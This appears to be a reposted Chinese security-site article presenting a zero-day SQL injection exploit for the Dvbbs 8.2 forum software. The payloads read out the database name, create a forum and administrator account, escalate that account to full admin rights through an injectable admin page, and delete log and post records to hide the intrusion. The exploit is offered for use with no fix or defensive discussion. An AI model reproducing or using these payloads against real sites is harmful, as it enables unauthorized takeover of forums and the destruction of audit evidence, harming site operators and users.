首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
dvbbs 8.2前台0day
来源:小航blog 作者:小航 发布时间:2009-12-25  

小航blog
利用:
发帖子,标题为下面的sql语句,然后点评论。0为中立, 1为支持, 2为反对 都行。
这时sql语句被执行
库名:
a’,’’,1,’hang’,’2008-2-4’,’’,2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username=’hang’--
加前台和后台管理员:
a’,’’,1,’hang’,’2008-2-4’,’’,2);update dv_user set UserGroupID=1 where username=’hang’;insert into dv_admin(Username,Password,Flag,Adduser)values(’hang’,’965eb72c92a549dd’,’,4,’,’hang’)--
进入后台,通过注入再获取全部权限:
http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag=’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45’/**/where/**/username=’hang’--
清理数据库记录(有三个表):
http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username=’hang’;delete/**/from/**/dv_topic/**/
where/**/PostUsername=’hang’;delete/**/from/**/Dv_Appraise/**/where/**/UserName=’hang’--
(因为是通过后台注入来执行delete语句,所以最后Dv_log还是有一条关于后台help.asp文件访问记录)


未验证!读者请自行验证!


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·PHPMPS 0day
·supersite7.5找回密码的鸡肋问题
·MvMmall漏洞分析
·对Fckeditor的一些漏洞总结
·php168 v6.0拿shell漏洞
·Google Wave XSS(Unpatched)
·Discuz!的最新拿Webshell法,测
·PHP漏洞全解(六)-跨网站请求伪造
·PHP漏洞全解(五)-SQL注入攻击
·PHP漏洞全解(四)-xss跨站脚本攻
·PHP漏洞全解(三)-客户端脚本植入
·PHP漏洞全解(二)-命令注入攻击
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved